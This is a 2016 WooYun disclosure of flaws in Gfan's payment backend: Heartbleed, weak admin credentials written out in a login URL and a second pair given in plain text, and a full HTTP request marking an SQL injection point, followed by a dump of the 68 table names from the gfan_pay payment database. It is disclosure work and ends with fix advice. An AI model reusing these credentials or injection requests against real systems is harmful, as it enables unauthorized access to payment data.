当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2016-0173640
漏洞标题:
机锋网openssl心脏滴血/后台存在SQL注入漏洞
相关厂商:
机锋网
漏洞作者:
darkrerror
提交时间:
2016-01-29 15:56
修复时间:
2016-02-03 16:00
公开时间:
2016-02-03 16:00
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2016-01-29: 细节已通知厂商并且等待厂商处理中
2016-02-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

心脏滴血漏洞:
https://gms.gfan.com

q1.jpg


q2.jpg


弱口令:
http://gms.gfan.com:8080/loginAction.do?method=login&password=admin&username=admin
duyun/123456

q3.jpg


注入 :

GET /messageConsumeDetailClientAction.do?method=findList&searchModel=1&type=on&beginDate=2016-01-21&endDate=2016-01-28&searchType=3&searchContent=&appKey=0&channelId=【注入点】 HTTP/1.1
Host: gms.gfan.com:8080
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: pgv_pvid=7868685976; pgv_pvi=3890574959; tma=227519179.71033145.1453946842670.1453946842670.1453946842670.1; tmd=13.227519179.71033145.1453946842670.; bfd_g=8a7bc81f66bd068d00007994001eb3685657f5ae; Hm_lvt_94a1188546fb923d8b3b2187e3fab67b=1453966434; Jb1kcwceGvQ="RSl21GK7Bz+ZfiFmSC6RT4ok5rdLyjnWIT+0aQJUFHk="; cva4j+xqajE="x268oKYi94HeCy4ffuE5Eq9Th5eejEcrdFqAiDdJIp/3hjHregTpHZenfvd4eQETgrep41MRdz4="; __utma=227519179.506361208.1453946842.1453966434.1454030994.3; __utmc=227519179; __utmz=227519179.1453946842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_6790309a725fc338d4fe3efb72d4a6ea=1454031169; Hm_lpvt_6790309a725fc338d4fe3efb72d4a6ea=1454031169; JSESSIONID=D0548E95C7A3ADA4A1F50AEF61E99E22


管理员账号密码:

q4.jpg


漏洞证明:

Database: gfan_pay
[68 tables]
+------------------------------+
| user                         |
| action_type                  |
| admin_operate_log            |
| admin_user                   |
| app_info_apk                 |
| card_config                  |
| channel                      |
| charge_log                   |
| check_check_info             |
| check_check_status           |
| client_channel               |
| consume_log                  |
| contrast_appkey_productid    |
| login_log_20121222           |
| login_log_tmp                |
| payorder_status_log          |
| rebate_info                  |
| recharge_alipay_notify_log   |
| recharge_channel             |
| recharge_channel_account     |
| recharge_dic_channel         |
| recharge_jd_notify_log       |
| recharge_junka_notify_log    |
| recharge_log                 |
| recharge_mo9_notify_log      |
| recharge_order               |
| recharge_order_history       |
| recharge_order_operate_log   |
| recharge_order_reb           |
| recharge_request             |
| recharge_submit              |
| recharge_tenpay_notify_log   |
| recharge_uc_recharge_log     |
| recharge_unionpay_notify_log |
| recharge_unionpay_trade_log  |
| recharge_wechat_notify_log   |
| sdk_app                      |
| sdk_message_client_log       |
| sdk_message_pay_log          |
| sdk_pay_log                  |
| sdk_pay_point_arrive         |
| sdk_save_ios_order           |
| sdk_sp_dictionary            |
| sdk_sp_sms                   |
| sdk_tag_phone_log            |
| sdk_update_log               |
| shenzhoufu                   |
| sp_channelinfo_admini        |
| sp_companyinfo_admini        |
| sp_developerinfo_admini      |
| sp_errormessages_log         |
| sp_install_forwardtell_log   |
| sp_partname_admini           |
| sp_pay_forwardtell_log       |
| sp_spcustom_admini           |
| sp_statusreport_log          |
| sp_support_admini            |
| sp_uploadinterface_log       |
| sp_userinfo_admini           |
| sp_version_admini            |
| test                         |
| tgr_getcharge_logbyuid       |
| tgr_getconsume_logbyuid      |
| tgr_getsdk_appbyuid          |
| uc_pay_log                   |
| uc_uid_imei                  |
| user_payorder_url            |
| wap_test                     |
+------------------------------+

修复方案:

升级openssl
增强口令
用参数化方法构建SQL语句,以防止数据库执行从用户输入插入的SQL语句。

版权声明:转载请注明来源 darkrerror@乌云

>

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-02-03 16:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无